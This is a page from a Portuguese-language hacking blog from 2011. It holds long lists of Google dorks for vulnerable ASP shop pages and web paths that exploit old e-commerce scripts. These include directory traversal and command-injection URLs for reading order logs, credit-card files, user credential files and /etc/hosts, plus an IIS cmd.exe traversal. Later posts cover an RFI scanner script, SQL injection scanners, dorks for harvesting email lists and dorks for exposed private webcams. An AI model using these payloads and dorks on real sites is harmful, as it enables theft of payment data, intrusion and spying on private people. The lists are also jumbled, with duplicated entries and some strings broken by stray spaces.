inurl:"prodlist.asp?catid="
inurl:"product.asp?bookID="
inurl:"product.asp?intProdID="
inurl:"product_info.asp?item_id="
inurl:"productDetails.asp?idProduct="
inurl:"productDisplay.asp"
inurl:"productinfo.asp?item="
inurl:"productlist.asp?ViewType=Category&CategoryID= "
inurl:"productpage.asp"
inurl:"products.asp?ID="
inurl:"products.asp?keyword="
inurl:"products_category.asp?CategoryID="
inurl:"products_detail.asp?CategoryID="
inurl:"productsByCategory.asp?intCatalogID="
inurl:"prodView.asp?idProduct="
inurl:"promo.asp?id="
inurl:"promotion.asp?catid="
inurl:"pview.asp?Item="
inurl:"resellers.asp?idCategory="
inurl:"results.asp?cat="
inurl:"savecart.asp?CartId="
inurl:"search.asp?CartID="
inurl:"searchcat.asp?search_id="
inurl:"Select_Item.asp?id="
inurl:"Services.asp?ID="
inurl:"shippinginfo.asp?CartId="
inurl:"shop.asp?a="
inurl:"shop.asp?action="
inurl:"shop.asp?bookid="
inurl:"shop.asp?cartID="
inurl:"shop_details.asp?prodid="
inurl:"shopaddtocart.asp"
inurl:"shopaddtocart.asp?catalogid="
inurl:"shopbasket.asp?bookid="
inurl:"shopbycategory.asp?catid="
inurl:"shopcart.asp?title="
inurl:"shopcreatorder.asp"
inurl:"shopcurrency.asp?cid="
inurl:"shopdc.asp?bookid="
inurl:"shopdisplaycategories.asp"
inurl:"shopdisplayproduct.asp?catalogid="
inurl:"shopdisplayproducts.asp"
inurl:"shopexd.asp"
inurl:"shopexd.asp?catalogid="
inurl:"shopping_basket.asp?cartID="
inurl:"shopprojectlogin.asp"
inurl:"shopquery.asp?catalogid="
inurl:"shopremoveitem.asp?cartid="
inurl:"shopreviewadd.asp?id="
inurl:"shopreviewlist.asp?id="
inurl:"ShopSearch.asp?CategoryID="
inurl:"shoptellafriend.asp?id="
inurl:"shopthanks.asp"
inurl:"shopwelcome.asp?title="
inurl:"show_item.asp?id="
inurl:"show_item_details.asp?item_id="
inurl:"showbook.asp?bookid="
inurl:"showStore.asp?catID="
inurl:"shprodde.asp?SKU="
inurl:"specials.asp?id="
inurl:"store.asp?id="
inurl:"store_bycat.asp?id="
inurl:"store_listing.asp?id="
inurl:"Store_ViewProducts.asp?Cat="
inurl:"store-details.asp?id="
inurl:"storefront.asp?id="
inurl:"storefronts.asp?title="
inurl:"storeitem.asp?item="
inurl:"StoreRedirect.asp?ID="
inurl:"subcategories.asp?id="
inurl:"tek9.asp?"
inurl:"template.asp?Action=Item&pid="
inurl:"topic.asp?ID="
inurl:"tuangou.asp?bookid="
inurl:"type.asp?iType="
inurl:"updatebasket.asp?bookid="
inurl:"updates.asp?ID="
inurl:"view.asp?cid="
inurl:"view_cart.asp?title="
inurl:"view_detail.asp?ID="
inurl:"viewcart.asp?CartId="
inurl:"viewCart.asp?userID="
inurl:"viewCat_h.asp?idCategory="
inurl:"viewevent.asp?EventID="
inurl:"viewitem.asp?recor="
inurl:"viewPrd.asp?idcategory="
inurl:"ViewProduct.asp?misc="
inurl:"voteList.asp?item_ID="
inurl:"whatsnew.asp?idCategory="
inurl:"WsAncillary.asp?ID="

/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&ac count=administrator
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp&Board=6210&Idle=10&Sort=0&Order=Des cend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=other
isinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=o rder.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.l og
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_ files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=o rder.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=ord er.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template= order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&templa te=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template= sales.log
/cgi-bin/shopper.exe?search=action&keywords=***&template=se ll.log
/cgi-bin/shopper.exe?search=action&keywords=order&template= admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=adm in_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=sh opper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt

sexta-feira, 25 de fevereiro de 2011

SCANNER SQLI ONLINE - GOOGLE INURL BRASIL

Scanner SQLI Google INURL Brasil, utilizando dork simples resultados imediatos sem riscos de virus e 100% gratuito.
uso indevido responsabilidade do usuario todo conteúdo com fins de estudo.

domingo, 20 de fevereiro de 2011

SCRIPT PHP Security-Shell RFI Scanner v1.0

Segurança Shell RFI Scanner v1.0 é um scan de rfi pra você scanner de plantão.

* Copyright (C) 2007 por pentest
* Http://security-sh3ll.com
* Este programa é software livre, pode redistribuí-lo e / ou modificá-
* Sob os termos da GNU General Public License conforme publicada pela
** Mas SEM NENHUMA GARANTIA, sem mesmo a garantia implícita de *COMERCIALIZAÇÃO ou ADEQUAÇÃO PARA UM DETERMINADO PROPÓSITO. Veja o * Licença Pública Geral GNU para obter mais detalhes.

/***************************************************************************
*   PHP Security-Shell RFI Scanner v1.0                                   *
*                                                                         *
*   Copyright (C) 2007 by pentest                                         *
*                                                                         *
*   http://security-sh3ll.com                                             *
*                                                                         *
*   This program is free software; you can redistribute it and/or modify *
*   it under the terms of the GNU General Public License as published by *
*   the Free Software Foundation; either version 2 of the License, or     *
*   (at your option) any later version.                                   *
*                                                                         *
*   This program is distributed in the hope that it will be useful,       *
*   but WITHOUT ANY WARRANTY; without even the implied warranty of        *
*   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the         *
*   GNU General Public License for more details.                          *
*                                                                         *
***************************************************************************/

    $escan_inc_regex   = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' );
    /* Regex to extract the names of variables */
    $escan_var_regex   = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' );
    /* Array of file extensions to scan */
    $escan_valid_ext   = array( 'php' );
    /* Maximum size of a file to scan, scans all if 0 */
    $escan_max_size    = 0;
    /* Counter crawled directory */
    $escan_dir_count   = 0;
    /* Perpetual scanned files */
    $escan_file_count = 0;
    /* Perpetual potential rfi found */
    $escan_match_count = 0;
    /*Perpetual crawled total bytes */
    $escan_byte_count = 0;

    escan_banner();

    if( $argc < 2 ){
        escan_usage($argv[0]);
    }
    else{

        $stime = escan_get_mtime();

        escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR );

        $etime = escan_get_mtime();

        print "\n@ Scan report : \n\n" .
              "\t$escan_dir_count directory .\n".
              "\t$escan_file_count file .\n".
              "\t" . escan_format_size($escan_byte_count) . " .\n".
              "\t$escan_match_count Potential RFI .\n".
              "\t".($etime-$stime) . " Second Processing .\n\n";
    }

    /* A string formats in a magnitude expressed in bytes */
    function escan_format_size($bytes)
    {
        if( $bytes < 1024       ) return "$bytes bytes";
        if( $bytes < 1048576    ) return ($bytes / 1024) . " Kb";
        if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb";

        return ($bytes / 1073741824) . " Gb";
    }

    /* Returns the timestamp in seconds */
    function escan_get_mtime()
    {
        list($usec, $sec) = explode(" ",microtime());
        return ((float)$usec + (float)$sec);
    }

    /* Extracts line of code inclusion */
    function escan_scan_line($content,$offset)
    {
        list( $line, $dummy ) = explode( ";" , substr($content,$offset,strlen($content)) );

        return $line.";";
    }

    /* Extract the variable name from line of code inclusion */
    function escan_parse_var( $line, $regex_id )
    {
        global $escan_var_regex;

        $vars       = preg_split($escan_var_regex[$regex_id],$line);
        $varname    = $vars[1];
        $delimiters = " .);";

        for( $i = 0; $i < strlen($varname); $i++ ){
            for( $j = 0; $j < strlen($delimiters); $j++ ){
                if($varname[$i] == $delimiters[$j]){
                    return substr( $varname, 0, $i );
                }
            }
        }

        return $varname;
    }

    /* Check if the variable $var is defined in $content before position $offset*/
    function escan_check_definitions($content,$offset,$var)
    {
        if( strpos( $var, "->" ) ){
            return 1;
        }

        $chunk = substr($content,0,$offset);
        $regex = "/".preg_quote($var,"/")."\s*=/ix";
        preg_match( $regex, $chunk,$matches );

        return count($matches);
    }

    /* $file the file to check for potential rfi */
    function escan_parse_file($file)
    {
        global $escan_inc_regex;
        global $escan_max_size;
        global $escan_file_count;
        global $escan_match_count;
        global $escan_byte_count;

        $fsize = filesize($file);

        if( $escan_max_size && $fsize > $escan_max_size ) return;

        $escan_file_count++;
        $escan_byte_count += $fsize;

        $content = @file_get_contents($file);

        for( $i = 0; $i < count($escan_inc_regex); $i++ ){
            if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PREG_OFFSET_CAPTURE ) ){

                $nmatch = count($matches[0]);

                for( $j = 0; $j < $nmatch; $j++ ){
                    $offset = $matches[0][$j][1];
                    $line   = escan_scan_line($content,$offset);
                    $var    = escan_parse_var($line,$i);

                    if( escan_check_definitions($content,$offset,$var) == 0 )
                    {
                        $escan_match_count++;
                        print "@ $file - \n\t- '$var' The position $offset .\n";
                    }
                }
            }
        }
    }

    /* Returns the file extension $fname */
    function escan_get_file_ext($fname)
    {
        if( strchr($fname,'.') ){
            return substr($fname,strrpos($fname,'.')+1);
        }
        else{
            return "";
        }
    }

    /* Check if file $fname is a valid extension */
    function escan_isvalid_ext($fname)
    {
        global $escan_valid_ext;

        for( $i = 0; $i < count($escan_valid_ext); $i++ ){
            if(strstr(escan_get_file_ext($fname),$escan_valid_ext[$i])){
                return true;
            }
        }

        return false;
    }

    /* That function scans directories recursively */
    function escan_recurse_dir($dir)
    {
        global $escan_dir_count;

        $escan_dir_count++;

        if( $cdir = @dir($dir) ){
            while( $entry = $cdir->read() ){
                if( $entry != '.' && $entry != '..' ){
                    if( is_dir($dir.$entry) ){
                        escan_recurse_dir($dir.$entry.DIRECTORY_SEPARATOR);
                    }
                    else{
                        if( escan_isvalid_ext($dir.$entry) ){
                            escan_parse_file($dir.$entry);
                        }
                    }
                }
            }

            $cdir->close();
        }
    }

    function escan_banner()
    {
        print "*-----------------------------------------------------*\n" .
              "*   PHP Security-Shell RFI Scanner v1.0 by pentest   *\n" .
              "*                                                     *\n" .
              "*             http://security-sh3ll.com               *\n" .
              "*-----------------------------------------------------*\n\n";
    }

    function escan_usage($pname)
    {
        print "Use : php $pname \n";
    } ?>

Scanner SQLI online feito pelo grupo HCV

Scanner SQLI online feito pelo grupo kinginfet

Scanner SQLI online feito pelo grupo HCV, alem de scan ele ja testa as vull utilizando tecnicas sql injection espero que que gostem vou colocar um scan online com strins especiais para ele, bom scan.

Programa Scanner de vulnerabilidade em Joomla CMS

JOOMLA SECURITY SCANNER 

Aé vai um programa scanner que varre vulnnerabilidades de sites feitos em joomla ,segui o link logo abaixo

Programa Scanner de vulnerabilidade em Joomla CMS

BAIXA O SCANNER:

goo.gl/OvNwP

quarta-feira, 16 de fevereiro de 2011

Capturando lista de email em base csv.

Creia uma Dork para procura de List-mail em bases csv dentro de site,
abaixo segui uma introdução sobre o que é CSV

Comma-separated values (CSV), em português Valores Separados por Vírgula, é um formato de arquivo que armazena dados tabelados, cujo grande uso data da época dos mainframes. Por serem bastante simples, arquivos .csv são comuns em todas as plataformas de computador.

O CSV é um implementação particular de arquivos de texto separados por um delimitador, que usa a vírgula e a quebra de linha para separar os valores. O formato também usa as aspas em campos no qual são usados os caracteres reservados (vírgula e quebra de linha). Essa robustez no formato torna o CSV mais amplo que outros formatos digitais do mesmo segmento.

Especificação

Embora não exista uma especificação formal do formato CSV, o RFC 4180 descreve um formato comum e estabelece text/csv como um tipo MIME registrado na IANA. Formalmente, o CSV é um formato de dados delimitado que possui campos (colunas) separados por caracteres de vírgula e registros (linhas) separados por caracteres de quebra de linha. Campos que contêm caracteres especiais (vírgula, quebra de linha ou aspas) devem ser envolvidos em aspas. Entretanto, se uma linha contiver uma única entrada que seja uma cadeia vazia, ela também pode ser envolvida por aspas. Se um campo contiver um caractere de aspas, ele é discernido posicionando outro caractere igual logo em seguida. O formato CSV não requisita uma codificação de caracteres, uma ordenação de bytes ou um formato de terminador de linha.

Exemplo

1997	Ford	E350	ac, abs, moon	3000.00
1999	Chevy	Venture "Extended Edition"		4900.00
1996	Jeep	Grand Cherokee	MUST SELL! air, moon roof, loaded	4799.00

A tabela acima pode ser ser representada em CSV da seguinte maneira:

1997,Ford,E350,"ac, abs, moon",3000.00
1999,Chevy,"Venture ""Extended Edition""",,4900.00
1996,Jeep,Grand Cherokee,"MUST SELL!
air, moon roof, loaded",4799.00

------------------------------------------------------------------------------------------------------------

Quantidade:Aproximadamente 1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com.br
Código de pesquisa:
+@ +intext:(*mail*) +hotmail +br ext:csv

terça-feira, 25 de janeiro de 2011

Busca de webcans online

Fiz essa string para aqueles que gostam de fuçar a vida do próximo com esse código de busca temos acesso á Aproximadamente 79.900 resultados (0,31 segundos), em nossa busca exclusão de site que contenham o termo hack,hacker,crack, assim nossa busca fica mais limpa e objetiva.

Quantidade:1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com.br

Código:
+inurl:/control/userimage.html -blog -hack -hacker -crack

String para buscar proxy uma lista

Proxy é um servidor que atende a requisições repassando os dados do cliente à frente. Um usuário (cliente) conecta-se a um servidor proxy, requisitando algum serviço, como um arquivo, conexão, website, ou outro recurso disponível em outro servidor.

Um servidor proxy pode, opcionalmente, alterar a requisição do cliente ou a resposta do servidor e, algumas vezes, pode disponibilizar este recurso sem nem mesmo se conectar ao servidor especificado. Pode também atuar como um servidor que armazena dados em forma de cache em redes de computadores. São instalados em máquinas com ligações tipicamente superiores às dos clientes e com poder de armazenamento elevado.

Esses servidores têm uma série de usos, como filtrar conteúdo, providenciar anonimato, entre outros.

Um HTTP caching proxy, por exemplo, permite que o cliente requisite um documento na World Wide Web e o proxy procura pelo documento em seu cache. Se encontrado, o documento é retornado imediatamente. Caso contrário, o proxy busca o documento no servidor remoto, entrega-o ao cliente e salva uma cópia no seu cache. Isso permite uma diminuição na latência, já que o servidor proxy, e não o servidor original, é acessado, proporcionando ainda uma redução do uso de banda.

Com isso temos conhecimento da importância de um proxy

criei um dork google pra busca destas listas de proxy disponíveis em sites

String dork

Quantidade:1 string
Autor:Cleiton Pinheiro
Fonte:blog.inurl.com.br

Código:

+":8080" +":3128" +":80" filetype:txt

Lista de proxy

Dorks para scanner de RFI

Remote File Inclusion (RFI) é um tipo de vulnerabilidade mais freqüentemente encontrados em sites, que permite a um atacante para incluir um arquivo remoto normalmente através de um script no servidor web . The vulnerability occurs due to the use of user supplied input without proper validation. A vulnerabilidade ocorre devido ao uso do produto fornecido a entrada do usuário sem a devida validação. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to: Isso pode levar a algo tão mínimo como saída o conteúdo do arquivo, mas dependendo da gravidade, para listar alguns, pode levar a:

Code execution on the web server A execução de código no servidor web
Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS). A execução de código no lado do cliente , tais como o Javascript , que pode levar a outros ataques, tais como "cross site scripting (XSS).
Denial of Service (DoS) Denial of Service (DoS)
Data Theft /Manipulation O roubo de dados / Manipulação

Strings de RFI - INJECTION
uma pequena lista dorks

Quantidade:Aproximadamente 596strings
Autor:Desconhecido
Fonte:goo.gl/5IPJM

Páginas

Parceiro: Camisetas Hacker